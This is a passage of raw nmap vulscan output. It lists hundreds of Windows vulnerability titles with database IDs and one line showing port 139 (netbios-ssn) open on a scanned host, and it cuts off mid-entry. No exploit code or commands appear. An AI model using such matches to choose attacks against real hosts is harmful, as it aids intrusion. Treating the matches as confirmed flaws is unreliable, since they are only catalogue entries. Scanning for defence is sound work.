Microsoft Windows ME ssdpsrv.exe Crafted SSDP Message DoS [20256] Microsoft Windows 2000 NTFS Volume Macintosh Client Directory Permission Modification [20222] Microsoft Windows 2000 runas.exe Named Pipe Spoofing Information Disclosure [20221] Microsoft Windows 2000 runas.exe Named Pipe Single Thread DoS [20220] Microsoft Windows 2000 runas.exe Cleartext Authentication Information Disclosure [20188] Microsoft Windows Crafted SMB SMBnegprots Request DOS [20148] Microsoft Windows smbmount Directory Manipulation Saturation DoS [20028] Microsoft Windows XP SP2 TFTP Local Overflow [20002] Microsoft Windows 2000 CHKDSK Fix Mode File ACL Failure [20001] Microsoft Windows 2000 Terminal Service Client Connection IP Logging Failure [20000] Microsoft Windows 2000 Domain Administrator Computer Lock Bypass [19999] Microsoft Windows 2000 FQDN Domain Login Password Expiry Bypass [19998] Microsoft Windows 2000 UPN Credentialed Login Group Policy Failure [19997] Microsoft Windows 2000 WideCharToMultiByte Function String Termination Issue [19996] Microsoft Windows 2000 Event ID 1704 Group Policy Failure [19995] Microsoft Windows 2000 SECEDIT Long Folder ACL Set Issue [19994] Microsoft Windows 2000 audit directory service access 565 Event Logging Failure [19993] Microsoft Windows 2000 LDAPS CA Trust Issue [19922] Microsoft Windows Client Service for NetWare (CSNW) Remote Overflow [19904] Microsoft Windows DTC Packet Relay DoS [19903] Microsoft Windows DTC Transaction Internet Protocol (TIP) DoS [19902] Microsoft Windows COM+ Remote Code Execution [19901] Microsoft Windows FTP Client Arbitrary File Write [19900] Microsoft Windows Shell Crafted .lnk File Arbitrary Code Execution (2005-2122) [19899] Microsoft Windows Shell Crafted .lnk File Arbitrary Code Execution (2005-2118) [19898] Microsoft Windows Web View Arbitrary Script Injection [19873] Microsoft Windows XP Wireless Zero Configuration Credential/Key Disclosure [19857] Microsoft Windows SeDebugPrivilege NtSystemDebugControl Function Privilege Escalation [19775] Microsoft Windows XP ISAKMP UDP Saturation DoS [19764] Microsoft Windows XP Malformed explorer.exe.manifest Local DoS [19287] Microsoft Windows Firewall Malformed Registry Entry Ruleset Exception Weakness [19187] Microsoft Windows NT/2000 DNS Server Non-delegated NS Glue Record Cache Poisoning [19185] Microsoft Windows XP Internet Connection Firewall sessmgr.exe Accss Control Bypass [19007] Microsoft Windows 95 smbclient Triple Dot Traversal Arbitrary Command Execution [19006] Microsoft Windows NT snmp.exe Malformed OID Packet Saturation DoS [18956] Microsoft Windows Registry Editor (Regedt32.exe) Long String Obfuscation [18830] Microsoft Windows UMPNPMGR wsprintfW Remote Overflow [18829] Microsoft Windows Open Type (EOT) Font Handling Remote Overflow [18828] Microsoft Windows Distributed Transaction Coordinator (DTC) Memory Modification Remote Code Execution [18824] Microsoft Windows Unspecified Remote Code Execution (EEYEB-20050627) [18823] Microsoft Windows Kernel APC Queue Manipulation Local Privilege Escalation [18821] Microsoft Windows Unspecified Remote Code Execution (EEYEB-20050505) [18820] Microsoft Windows GDI EMF/WMF Metafile Processing Multiple Overflows [18730] Microsoft Windows XP SP1 Raw IP Empty Datagram DoS [18729] Microsoft Windows SNMP LAN Manager (LANMAN) MIB Extension GET/NEXT Request DoS [18728] Microsoft Windows QueryIpMatching Weakness DNS Cache Poisoning [18681] Microsoft Windows XP User Account Manager Hidden User [18624] Microsoft Windows Remote Desktop Protocol (RDP) Crafted Packet Remote DoS [18609] Microsoft Windows Kerberos PKINIT Domain Controller Spoofing [18608] Microsoft Windows Kerberos Crafted Packet Remote DoS [18607] Microsoft Windows Print Spooler Service Remote Overflow [18606] Microsoft Windows Telephony Application Programming Interface (TAPI) Overflow [18605] Microsoft Windows Plug-and-Play Service Remote Overflow [18545] Microsoft Windows NT Cenroll ActiveX (xenroll.dll) File Creation Saturation DoS [18493] Microsoft Windows USB Device Driver Overflow [17893] Microsoft ASP.NET RPC/encoded Mode Malformed SOAP Message DoS [17885] Microsoft Windows Network Connections Service netman.dll Remote DoS [17830] Microsoft Windows Color Management Module ICC Profile Format Tag Remote Overflow [17434] Microsoft Windows ASN.1 BERDecBitString Function Overflow [17309] Microsoft Windows Web Client Request Processing Remote Code Execution [17308] Microsoft Windows Server Message Block (SMB) Remote Code Execution [17305] Microsoft Windows HTML Help (CHM) File Overflow [17304] Microsoft Windows Interactive Training .cbo File User Field Overflow [17131] Microsoft Windows Remote Desktop Protocol (RDP) Private Key Disclosure [16494] Microsoft Windows Media Player WMDRM License Acquisition Page Redirection [16430] Microsoft Windows Animated Cursor (ANI) Capability AnimationHeaderBlock Length Field Overflow [15981] Microsoft Windows XP helpctr.exe Crafted URL Command Execution [15739] Microsoft Windows Malformed Image Rendering DoS [15707] Microsoft Windows Explorer Web View Arbitrary Script Insertion [15469] Microsoft Windows MSHTA Shell Application Association Arbitrary Remote Script Execution [15463] Microsoft Windows IP Validation Failure Remote Code Execution [15462] Microsoft Windows CSRSS Local Overflow [15461] Microsoft Windows Object Management Malformed Request DoS [15460] Microsoft Windows Kernel Access Request Local Privilege Escalation [15459] Microsoft Windows Font Processing Local Privilege Escalation [15458] Microsoft Windows Message Queuing Remote Overflow [15379] Microsoft Windows ActiveDirectory LDAP Authentication Bypass [15363] Microsoft Windows Explorer.exe Malformed .wmf Processing DoS [15343] Microsoft Windows Server 2003 Malformed HTTP Cookie Header CGI DoS [15341] Microsoft Windows Server 2003 SMB Redirector Processing DoS [15340] Microsoft Windows Server 2003 Terminal Service Client Print DoS [15339] Microsoft Windows Server Atmf.dll Adobe Font Unloading DoS [15338] Microsoft Windows Server 2003 Terminal Session Close DoS [15337] Microsoft Windows Server 2003 CreateProcessWithLogonW() Function Process Disclosure [15336] Microsoft Windows Server 2003 Shutdown.exe Shut Down Failure [15335] Microsoft Windows Server 2003 MIT Kerberos Realm Authentication Group Policy Failure [15334] Microsoft Windows Server 2003 Shared Folder Permission Weakness [15333] Microsoft Windows Server 2003 EFS File Copy LDAP Connection DoS [15332] Microsoft Windows Server 2003 Citrix Metaframe Encryption Policy Failure [15331] Microsoft Windows Server 2003 Home Folder Path Permission Inheritance Failure [15215] Microsoft Windows SMTP E-mail Malformed Time Stamp DoS [15171] Microsoft Windows XP Search Function Arbitrary XML Injection [15075] Microsoft Windows wab32.dll Malformed .wab File DoS [15011] Microsoft Windows Remote Desktop TSShutdn.exe Unauthenticated Shutdown DoS [14862] Microsoft Windows GDI32.DLL GetEnhMetaFilePaletteEntries() API EMF File DoS [14741] Microsoft Windows XP CommCtl32.dll Shatter Code Execution [14578] Microsoft Windows Malformed TCP SYN Loopback Packet Remote DoS (land) [14509] Microsoft Services for Unix Malformed RPC Client Fragment Packet DoS [14497] Microsoft Services for Unix RPC Library Malformed Packet Fragment DoS [14475] Microsoft Windows Script Engine for Jscript JsArrayFunctionHeapSort Overflow [14399] Microsoft Windows Media Player .wmf Detection Auto-Run Weakness [14182] Microsoft Windows Drive Restriction Group Policy Bypass [14118] Microsoft Windows Malformed ARP Packet Saturation DoS [13996] Microsoft Windows 2000 IKE Malformed Packet Saturation Remote DoS [13987] Microsoft Windows XP Help Center helpctr.exe Long hcp: URL Overflow [13959] Microsoft Windows Universal Plug and Play (UPnP) Malformed Request DoS [13609] Microsoft Windows Hyperlink Object Library Overflow [13602] Microsoft Windows OLE Input Validation Overflow [13601] Microsoft Windows COM Structured Storage Privilege Escalation [13600] Microsoft Windows SMB Transaction Data Overflow [13599] Microsoft Windows License Logging Service Overflow [13597] Microsoft Windows Media Player PNG File Overflow [13596] Microsoft Windows XP Named Pipe Username Disclosure [13595] Microsoft Windows Sharepoint Services HTML Redirection XSS [13577] Microsoft Windows NetBIOS Remote Host Information Disclosure [13481] Microsoft Windows NT OffloadModExpo CryptographyOffload Registry Key Permission Weakness [13480] Microsoft Windows NT MTS Package Administration Registry Key Permission Weakness [13477] Microsoft Windows Java Applet UDP Socket Exhaustion DoS [13476] Microsoft Windows Media Player asx Parser Multiple Tag Overflow [13475] Microsoft Windows 2000 Telnet Service Predictable Named Pipe Arbitrary Command Execution Variant [13474] Microsoft Windows 2000 Telnet Service Predictable Named Pipe Arbitrary Command Execution [13441] Microsoft Windows 2000 Security Interface Change Password Option Account Enumeration [13440] Microsoft Windows XP Hot Keys Screen Lock Bypass [13438] Microsoft Windows CONVERT.EXE FAT32 File Permission Conversion Failure [13437] Microsoft Windows 2000 Debug Register Local Privilege Escalation [13435] Microsoft Windows XP Port 445 Malformed SYN Packet DoS [13434] Microsoft Windows Distributed Transaction Coordinator (DTC) Malformed Input DoS [13424] Microsoft Windows 2000 Current Password Change Policy Bypass [13423] Microsoft Windows 2000 Terminal Server SYSVOL Share Connection Saturation Restriction Bypass [13422] Microsoft Windows PPTP Service Malformed Control Data Overflow [13421] Microsoft Windows XP RDP Malformed PDU Confirm Active Packet DoS [13420] Microsoft Windows NTFS Hard Link Audit Bypass [13419] Microsoft Windows Media Player Active Playlist Arbitrary HTML Script Execution [13416] Microsoft Windows NetDDE Agent WM_COPYDATA Message Arbitrary Code Execution (shatter) [13415] Microsoft Windows 2000 System Root Folder Search Path Permission Weakness [13413] Microsoft Windows XP Windows Shell Function .mp3/.wma Custom Attribute Overflow [13411] Microsoft Windows XP Redirector Function Long Parameter Overflow [13410] Microsoft Windows 2000 Accessibility Utility Manager Arbitrary Code Execution [13409] Microsoft Windows XP EXPLORER.EXE desktop.ini .ShellClassInfo Parameter Overflow [13408] Microsoft Windows SHELL32.DLL ShellExecute API Function Overflow [13389] Microsoft Windows DirectX QUARTZ.DLL Multiple Field .mid File Overflows [13330] Microsoft Windows HKLM Registry Key Locking DoS [12842] Microsoft Windows Cursor and Icon Validation Code Execution [12840] Microsoft Windows HTML Help Related Topics Arbitrary Command Execution [12832] Microsoft Windows Indexing Service Query Overflow [12655] Microsoft Windows Active Directory LSASS.EXE DoS [12625] Microsoft Windows winhlp32.exe Overflow [12624] Microsoft Windows Kernel ANI File Parsing DoS [12623] Microsoft Windows LoadImage API Overflow [12511] Microsoft Windows Media Player ActiveX Control setItemInfo() / getItemInfo() Arbitrary WMA File Manipulation [12510] Microsoft Windows Media Player ActiveX Control getItemInfoByAtom() Function File Information Disclosure [12507] Microsoft Windows XP SP2 Popup Blocker Bypass [12482] Microsoft Windows XP Dial-Up Access Firewall Disable [12378] Microsoft Windows WINS Association Context Validation Remote Code Execution [12377] Microsoft Windows NT DHCP Message Length Remote Overflow [12376] Microsoft Windows LSASS Identity Token Validation Local Privilege Escalation [12374] Microsoft Windows HyperTerminal Session File Remote Overflow [12372] Microsoft Windows Kernel Application Launch Local Privilege Escalation [12371] Microsoft Windows NT Malformed DHCP Packet Remote Overflow DoS [12370] Microsoft Windows WINS Computer Name Validation Remote Code Execution [12123] Microsoft Windows ipconfig.exe Overflow [12001] Microsoft Windows XP SP2 File Download Warning Bypass [12000] Microsoft Windows XP SP2 Unspecified Local Zone Access [11999] Microsoft Windows XP SP2 Unspecified Remote File Access [11936] Microsoft Windows shlwapi.dll Malformed HTML Tag Handling Null Pointer DoS [11917] Microsoft Windows XP SP2 Spoofed Content-Location Warning Bypass [11801] Microsoft Windows Small Buffer Length SMB Packet Overflow [11799] Microsoft Windows SMB Signing Group Policy Modification [11750] Microsoft Windows 2000 Message Queue Manager Queue Registration Request Overflow DoS [11479] Microsoft Windows NT Double Dot Samba Client DoS [11478] Microsoft Windows NT Malformed SMB Logon Request DoS [11477] Microsoft Windows NT LSASS.EXE Access Violation DoS [11476] Microsoft Windows NT DebugActiveProcess Function Privilege Escalation [11475] Microsoft Windows NT NtOpenProcessToken Permission Failure [11474] Microsoft Windows NT CSRSS Thread Exhaustion DoS [11473] Microsoft Windows NT Messenger Service Long Username DoS [11472] Microsoft Windows NT DNS Server Malformed Response DoS [11471] Microsoft Windows NT DNS Server Character Saturation DoS [11470] Microsoft Windows NT Help File Utility Overflow [11469] Microsoft Windows NT Malformed File Image Header DoS [11468] Microsoft Windows NT IOCTL Function DoS [11463] Microsoft Windows Authenticode ActiveX Install Failure Remote Code Execution [11462] Microsoft Windows HSC PCHealth System HCP URL Query Overflow [11461] Microsoft Windows Workstation Service WKSSVC.DLL Logging Function Remote Overflow [11453] Microsoft Windows 98 Malformed oshare Packet DoS [11264] Microsoft Windows NT SCM Malformed Resource Enumeration Request DoS [11259] Microsoft Windows NT Domain User Login System Policy Download Failure [11162] Microsoft Windows 95 .pwl File Weak Password Encryption [11161] Microsoft Windows 95 NetWare Remote Administration Hidden File Share [11158] Microsoft Windows NT Malformed Token Ring DoS [11156] Microsoft Windows NT tcpip.sys Malformed ICMP Request DoS [11096] Microsoft Windows ntconfig.pol Write Failure Access Restriction Bypass [11095] Microsoft Windows NT Ntconfig.pol Long Server Name Access Restriction Bypass [11094] Microsoft Windows NT User Mode Application Handle Closing DoS [11053] Microsoft Windows XP Explorer WAV Parsing DoS [11011] Microsoft Windows NT Netbt.sys Malformed DNS Response DoS [10999] Microsoft Windows Troubleshooter ActiveX Control Tshoot.ocx Arbitrary Code Execution [10997] Microsoft Windows Media Player ActiveX Control Unauthorized Media Library Manipulation [10975] Microsoft Windows NT Winpopup Long Username DoS [10938] Microsoft Windows User32.dll ComboBox CB_DIR Message Local Overflow [10937] Microsoft Windows User32.dll ListBox LB_DIR Message Local Overflow [10936] Microsoft Windows Messenger Service Message Length Remote Overflow [10908] Microsoft Windows XP SP2 ZIP Wizard ZoneID Tracking Failure [10854] Microsoft Windows XP Zip Manager zipfldr.dll Overflow DoS [10699] Microsoft Windows Program Group Converter Arbitrary Code Execution [10698] Microsoft Windows Shell Application Start Arbitrary Code Execution [10697] Microsoft Windows/Exchange NNTP Component Remote Overflow [10696] Microsoft Windows/Exchange SMTP DNS Lookup Overflow [10695] Microsoft Windows Compressed Folders DUNZIP32.DLL File Handling Overflow [10693] Microsoft Windows Unspecified Kernel Local DoS [10692] Microsoft Windows Metafile Image Format Arbitrary Code Execution [10691] Microsoft Windows Virtual DOS Machine Subsystem Local Privilege Escalation [10690] Microsoft Windows Management APIs Local Privilege Escalation [10689] Microsoft Windows NetDDE Remote Overflow [10688] Microsoft Windows WebDAV XML Message Handler Malformed Request DoS [10648] Microsoft Windows NT Default SNMP Registry Key Permission Weakness Local Privilege Escalation [10647] Microsoft Windows CIFS Browser Protocol Arbitrary NetBIOS Cache Entry Modification [10634] Microsoft Windows 95/98 Spoofed ARP Packet Cache Manipulation [10633] Microsoft Windows 2000 Protected Store Weak Encryption Default [10618] Microsoft Windows NT autorun.inf Arbitrary Command Execution [10616] Microsoft Windows NT Fragmented IP Packet Firewall Restriction Bypass [10615] Microsoft Windows NT linux smbmount Request DoS [10614] Microsoft Windows NT %systemroot% Path Inclusion [10609] Microsoft Windows WINS Malformed Packet Consumption DoS [10608] Microsoft Windows TCP/IP Last Sequence Forced RST DoS [10607] Microsoft Windows ICMP Redirect Spoofing DoS [10606] Microsoft Windows LSA NULL Policy Handle DoS [10604] Microsoft Windows NT PATH Working Directory Inclusion [10456] Microsoft Windows IPv6 Packet Fragmentation Handling DoS [10247] Microsoft Windows SMTP Service NTLM Null Session Mail Relay [10230] Microsoft Windows XP SP2 File/Print Share Restriction Bypass [9722] Microsoft Windows NT System Critical Registry Key Contain Bad Value [9579] Microsoft Windows NT GetThreadContext/SetThreadContext Kernel Mode Address DoS [9530] Microsoft Windows CRL File Digital Signature Verification Failure [9386] Microsoft Windows 2000 msinfo32.exe msinfo_file Variable Overflow [9359] Microsoft Windows Page File pagefile.sys Information Disclosure [9358] Microsoft Windows NT Event Log Inappropriate Permissions [9356] Microsoft Windows NT HKEY_CLASSES_ROOT Key Inappropriate System-Critical Permissions [9355] Microsoft Windows NT HKEY_LOCAL_MACHINE Key Inappropriate System-Critical Permissions [9349] Microsoft Windows NT Systems User Audit Policy Logging Weakness [9348] Microsoft Windows NT Non-NTFS File System Insecure [9152] Microsoft Windows XP SP2 Zone Identifier Object Value Warning Failure [9141] Microsoft Windows File Icon Spoofing [9140] Microsoft Windows XP Content-Location Local Computer Zone Bypass [9012] Microsoft Windows XP Internet Connection Firewall Bypass [8368] Microsoft Windows XP/2003 Login Screen Consumption DoS [8334] Microsoft Windows NT \?? Object Folder Symlink Privilege Escalation [8161] Microsoft Windows NT Invalid User Privileges [8160] Microsoft Windows NT File/Directory Invalid Permissions [8112] Microsoft Windows NT Weak Account Password Policy [8051] Microsoft Windows Networking Software Long Filename Handling Arbitrary Command Execution [7904] Microsoft Windows Media Player ActiveX File Existence Disclosure [7891] Microsoft Windows IE window.moveBy Function Pointer Hijack (HijackClickV2) [7855] Microsoft IE on Windows ME Javascript Cookie Set Bypass [7804] Microsoft Windows HTML Help Arbitrary Code Execution [7803] Microsoft Windows showHelp Arbitrary Code Execution [7800] Microsoft Windows POSIX Subsystem Privilege Escalation [7798] Microsoft Windows Task Scheduler Remote Overflow [7777] Microsoft Windows Media Control Preview Script Execution [7738] Microsoft Windows Media Player Skins File Arbitrary Command Execution [7576] Microsoft Windows NT RSHSVC .Rhosts Unauthorized Access [7182] Microsoft Windows Media Unicast Service Severed Connection Memory Leak DoS [7179] Microsoft Windows 2000 Event Viewer Snap-in Overflow [7178] Microsoft Windows Media Player WMP ActiveX Control Javascript Command Execution [6790] Microsoft Windows NT AEDebug Registry Key Weak Permissions [6515] Microsoft Windows 2000 Domain Expired Account Authentication [6221] Microsoft Windows XP desktop.ini CLSID Arbitrary Command Execution [6074] Microsoft Windows Me HSC hcp:// URL XSS [6053] Microsoft Windows Help and Support Center HCP URL Code Execution [5968] Microsoft Windows ARP Packet DoS [5966] Microsoft Windows NT SMB Traversal Arbitrary File Access [5858] Microsoft Windows NT Rshsvc.exe Arbitrary Command Execution [5687] Microsoft Windows IE and Explorer Share Name Overflow [5686] Microsoft Windows Telnet Service Account Information Disclosure [5558] Microsoft Windows Media Player Advanced Streaming Format Overflow [5313] Microsoft Windows Media Device Manager Invalid Local Storage Device Privilege Escalation [5312] Microsoft Windows Media Player .wma IE Cache Arbitrary Code Execution [5261] Microsoft Windows ASN.1 Double Free Code Execution [5260] Microsoft Windows SSL Library Malformed Message Remote DoS [5259] Microsoft Windows Negotiate SSP Code Execution [5258] Microsoft Windows Virtual DOS Machine Privilege Escalation [5257] Microsoft Windows Local Descriptor Table Privilege Escalation [5256] Microsoft Windows Unspecified H.323 Code Execution [5255] Microsoft Windows Management Privilege Escalation [5254] Microsoft Windows Utility Manager Privilege Escalation [5253] Microsoft Windows Help and Support Center Command Execution [5252] Microsoft Windows Metafile Code Execution [5251] Microsoft Windows Winlogon Command Execution [5250] Microsoft Windows SSL Library Private Communications Transport (PCT) Remote Overflow [5249] Microsoft Windows LDAP Crafted Request Remote DoS [5248] Microsoft Windows LSASS Remote Overflow [5179] Microsoft Windows 2000 microsoft-ds DoS [4877] Microsoft Windows Terminal Services Kerberos Double Authorization Data Entry [4467] Microsoft Windows WebDav ntdll.dll Remote Overflow [4170] Microsoft Windows 2000 Server Media Services TCP Packet Handling Remote DoS [3903] Microsoft Windows WINS Server Remote Overflow [3902] Microsoft Windows ASN.1 Library Integer Overflow [3711] Microsoft Windows XP Malicious Folder Automatic Code Execution [3111] Microsoft IE Windows Scripting Host (WSH) GetObject Javascript Function Arbitrary File Access [3106] Microsoft Windows Password Authentication Security Point of Failure [3067] Microsoft Windows Media Player ASF File Arbitrary Code Execution [2960] Microsoft Windows Messenger Service Social Engineering Weakness [2705] Microsoft Windows 2000 Windows Troubleshooter ActiveX Overflow [2692] Microsoft Windows Design Tools MDT2DD.DLL COM Object Memory Corruption Command Execution [2678] Microsoft Windows Overflow in ListBox and [2677] Microsoft Windows Arbitrary ActiveX Control Installation [2675] Microsoft Windows HCP protocol Overflow [2657] Microsoft Windows Message Queuing Service Heap Overflow [2655] Microsoft Windows Server 2003 Shell Folders Arbitrary File Access [2642] Microsoft Windows Unauthorised Thread Termination [2571] Microsoft Windows TCP Packet URG Value Information Disclosure [2540] Microsoft Windows 2003 Server Buffer Overflow Protection Mechanism Bypass [2507] Microsoft Windows NetBIOS Random Memory Content Disclosure [2328] Microsoft Windows NT 4.0 with IBM JVM DoS [2262] Microsoft Windows Media Player DHTML Local Zone Access [2247] Microsoft Windows Media Services Remote Command Execution #2 [2244] Microsoft Windows 2000 ShellExecute() API Let [2237] Microsoft Windows 2000 Active Directory Lsass.exe Overflow [2074] Microsoft Windows Server Message Block (SMB) Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS [2073] Microsoft Windows XP Network Share Provider Overflow [2072] Microsoft Windows Network Connection Manager Privilege Elevation [2051] Microsoft Windows User Shell Buffer Overflow [2037] Microsoft Windows Trusted Domain SID Remote Privilege Escalation [1990] Microsoft Windows Terminal Services False IP Address [1975] Microsoft Windows Terminal Server Service RDP Remote DoS [1928] Microsoft Windows NNTP Malformed Post DoS [1915] Microsoft Windows Media Player .NSC File Overflow [1912] Microsoft Windows Terminal Server Malformed RDP DoS [1861] Microsoft Windows Telnet Local System Call DoS [1860] Microsoft Windows Telnet Service Handle Leak DoS [1859] Microsoft Windows Telnet Multiple Sessions DoS [1858] Microsoft Windows Telnet Service Logon Backspace DoS [1840] Microsoft Windows Media Player Internet Shortcut Execution [1764] Microsoft Windows 2000 Domain Controller DoS [1758] Microsoft Windows 2000 Network DDE Escalated Privileges [1755] Microsoft Windows 2000 RDP Malformed Packet Handling Remote DoS [1735] Microsoft Windows NT SNMP WINS Database Deletion Remote DoS [1725] Microsoft Windows Media Player .WMZ Arbitrary Java Applet Execution [1672] Microsoft Windows 2000 Telnet Session Timeout DoS [1658] Microsoft Windows Media Player .ASX File Handling Overflow [1656] Microsoft Windows Media Player .WMS Arbitrary Script Execution [1639] Microsoft Windows NT Terminal Server RegAPI.DLL Username Overflow [1633] Microsoft Windows 2000 System Monitor ActiveX LogFileName Parameter Validation Overflow [1621] Microsoft Indexing Services for Windows 2000 .htw XSS [1607] Microsoft Windows 9x Invalid Driver Type DoS [1599] Microsoft Windows 9x / Me IPX NMPI Packet DoS [1591] Microsoft Windows 2000 OEMPreinstall Installation Permission Weakness [1578] Microsoft Windows 2000 Simplified Chinese IME Local Privilege Escalation [1571] Microsoft Windows Media Player Malformed Embedded OCX Control DoS [1563] Microsoft Windows / Office DLL Search Path Weakness [1546] Microsoft Windows Media Unicast Service Malformed Request DoS [1491] Microsoft Windows 9x IPX Ping Packet DoS [1437] Microsoft Windows 2000 Telnet Server Binary Zero Parsing Remote DoS [1399] Microsoft Windows 2000 Windows Station Access [1358] Microsoft Windows NT HostAnnouncement DoS [1308] Microsoft Windows NetBIOS NULL Source Name DoS [1297] Microsoft Windows 2000 Active Directory Object Attribute [1292] Microsoft Windows NT 4.0 / 2000 cmd.exe Buffer Overflow [1268] Microsoft Windows TCP/IP Printing Service DoS [1257] Microsoft Windows Media License Manager DoS [1251] Microsoft Windows MS DOS Device Name DoS [1226] Microsoft Windows Media Server Malformed Handshake Sequence DoS [1214] Microsoft Windows NT Recycle Bin Deleted File Access [1199] Microsoft Windows NT NtImpersonateClientOfPort LPC Privilege Escalation [1166] Microsoft Windows NT LsaLookupSids() DoS [1161] Microsoft Windows Help System File Manipulation Local Privilege Escalation [1146] Microsoft Windows 9x Credential Cache Cleartext Password Disclosure [1135] Microsoft Windows NT Print Spooler Service (spoolss.exe) AddPrintProvider() Function Alternate Print Provider Arbitrary Command Execution [1134] Microsoft Windows NT Print Spooler Malformed Request Overflow [1076] Microsoft Windows IP Source Routing [1075] Microsoft Windows NT RASMAN Path Subversion Privilege Escalation [1046] Microsoft Windows telnet.exe Argument Overflow [1022] Microsoft Windows Invalid IGMP Header Handling Remote DoS [1013] Microsoft Windows NT Screensaver Context Local Privilege Escalation [1010] Microsoft Windows NT Malformed LSA Request DoS [967] Microsoft Windows NT WINS Service Malformed Data DoS [945] Microsoft Windows 95/98 SMB Authentication Replay [943] Microsoft Windows NT SP4 Null NT Hash Value Share Access [931] Microsoft Windows NT GINA Arbitrary Clipboard Content Disclosure [868] Microsoft Windows Compressed Folders ZIP Decompression Arbitrary File Write [867] Microsoft Windows Compiled HTML Help (.chm) Arbitrary Command Execution [864] Microsoft Windows Certificate Enrollment ActiveX Arbitrary Certificate Deletion [858] Microsoft Windows NCM Handler Local Privilege Elevation [837] Microsoft Windows RAS Phonebook dial-up String Overflow [788] Microsoft Windows smss.exe Handle Duplication Local Privilege Escalation [773] Microsoft Windows 2000 Group Policy File Lock DoS [772] Microsoft Windows Multiple UNC Provider Request Overflow [736] Microsoft Windows SMB Enumeration Information Disclosure [732] Microsoft Windows SMTP Service Malformed BDAT Request Remote DoS [715] Microsoft Windows NT LsaQueryInformationPolicy Function NULL Session Domain SID Enumeration [714] Microsoft Windows NT LsaQueryInformationPolicy() Function SID User Account Disclosure [697] Microsoft Windows Universal Plug and Play NOTIFY DoS [692] Microsoft Windows Universal Plug and Play NOTIFY Overflow [665] Microsoft Windows 95 Online Registration Information Disclosure [608] Microsoft Windows IrDa Driver Malformed Packet Remote Overflow DoS [581] Microsoft Windows SMTP Incorrect Credentials Authentication Bypass [572] Microsoft Windows NT NTLMSSP Crafted LPC Request Local Privilege Escalation [515] Microsoft Windows 2000 LDAP Server Arbitrary User Password Modification [511] Microsoft Windows Malformed PPTP Packet Stream Remote DoS [499] Microsoft Windows NT Winsock2ProtocolCatalogMutex Mutex Local DoS [466] Microsoft Windows NT RAS Administration Registry Key Permission Weakness Local Privilege Escalation [454] Microsoft Windows 2000 NTLM Domain Account Lockout Policy Bypass [445] Microsoft Windows LAN Manager SNMP LanMan Information Disclosure [424] Microsoft Windows NT Malformed LPC Request Remote DoS [423] Microsoft Windows File Share Password Protection Bypass [418] Microsoft Windows telnet.exe NTLM Authentication Information Disclosure [403] Microsoft Windows 2000 Still Image Service WM_USER Message Local Overflow [385] Microsoft Windows Shell Executable (Explorer.exe) Registry Relative Path Privilege Escalation [336] Microsoft Windows CIFS Computer Browser ResetBrowser Frame DoS [335] Microsoft Windows Fragmented IP Packet Saturation DoS (jolt2) [334] Microsoft Windows Registry: Permission to Modify Common Paths [332] Microsoft Windows Registry Key Permission Weakness Admin Privilege Escalation [331] Microsoft Windows Remote Registry Access [316] Microsoft Windows NT Remote Registry Server WinLogon.exe Malformed Request Local DoS [304] Microsoft Windows NT service pack level via remote registry access [303] Microsoft Windows NetBIOS Null Session Remote Registry Access [300] Microsoft Windows SMB LanMan Pipe Server Listing Disclosure [299] Microsoft Windows NetBIOS Shares Access Control Weakness [297] Microsoft Windows Installation ADMIN$ Share Arbitrary Access [218] Microsoft Windows Multiple TCP/IP Stack Malformed Ping DoS [129] Microsoft Windows NT FTP 'guest' Account
139	tcp	open	netbios-ssn	syn-ack	Microsoft Windows netbios-ssn
	vulscan	VulDB - https://vuldb.com: [176522] Microsoft Windows 7 SP1 up to Server 2019 MSHTML Platform unknown vulnerability [176520] Microsoft Windows 10 20H2 up to Server 2004 DWM Core Library unknown vulnerability [176515] Microsoft Windows 10 up to Server 2019 Hyper-V denial of service [176514] Microsoft Windows 8.1 up to Server 2019 Server for NFS information disclosure [176513] Microsoft Windows 8.1 up to Server 2019 Server for NFS information disclosure [176512] Microsoft Windows 8.1 up to Server 2019 NFS denial of service [176511] Microsoft Windows 7 SP1 up to Server 2019 GPSVC unknown vulnerability [176510] Microsoft Windows 7 SP1 up to Server 2019 Event Tracing information disclosure [176509] Microsoft Windows 7 SP1 up to Server 2019 HTML Platform unknown vulnerability [176508] Microsoft Windows 8.1 up to Server 2019 TCP/IP Driver denial of service [176507] Microsoft Windows 10 20H2 up to Server 2019 Cloud Files Mini Filter Driver unknown vulnerability [176506] Microsoft Windows 7 SP1 up to Server 2019 Remote Desktop Services denial of service [176500] Microsoft Windows 7 SP1 up to Server 2019 Kerberos AppContainer unknown vulnerability [176499] Microsoft Windows 10 20H2/10 21H1/10 2004/Server 20H2/Server 2004 Bind Filter Driver information disclosure [176498] Microsoft Windows 7 SP1 up to Server 2019 Scripting Engine unknown vulnerability [176497] Microsoft Windows 7 SP1 up to Server 2019 NTLM unknown vulnerability [176495] Microsoft Windows 7 SP1 up to Server 2019 NTFS unknown vulnerability [176494] Microsoft Windows 10 20H2 up to Server 2004 Kernel information disclosure [176493] Microsoft Windows 7 SP1 up to Server 2019 Common Log File System Driver unknown vulnerability [176492] Microsoft Windows 7 SP1 up to Server 2019 Filter Manager unknown vulnerability [176491] Microsoft Windows 10 20H2 up to Server 2019 Kernel-Mode Driver unknown vulnerability [176490] Microsoft Windows 10 20H2 up to Server 2019 Kernel unknown vulnerability [176477] Microsoft Windows 7 SP1 up to Server 2019 Enhanced Cryptographic Provider unknown vulnerability [176474] Microsoft Windows 7 SP1 up to Server 2019 DCOM Server unknown vulnerability [174874] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking unknown vulnerability [174873] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking information disclosure [174871] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking unknown vulnerability [174870] Microsoft Windows 7 SP1 up to Server 2019 unknown vulnerability [174868] Microsoft Windows 8.1 up to Server 2019 CSC Service information disclosure [174866] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174865] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 HTTP Protocol Stack unknown vulnerability [174864] Microsoft Windows 10 20H2 up to Server 2019 Container Manager Service unknown vulnerability [174863] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174862] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174861] Microsoft Windows 10 20H2 up to Server 2019 Graphics unknown vulnerability [174849] Microsoft Windows 7 SP1 up to Server 2019 Bluetooth Driver unknown vulnerability [174848] Microsoft Windows 7 SP1 up to Server 2019 Infrared Data Association information disclosure [174847] Microsoft Windows 10 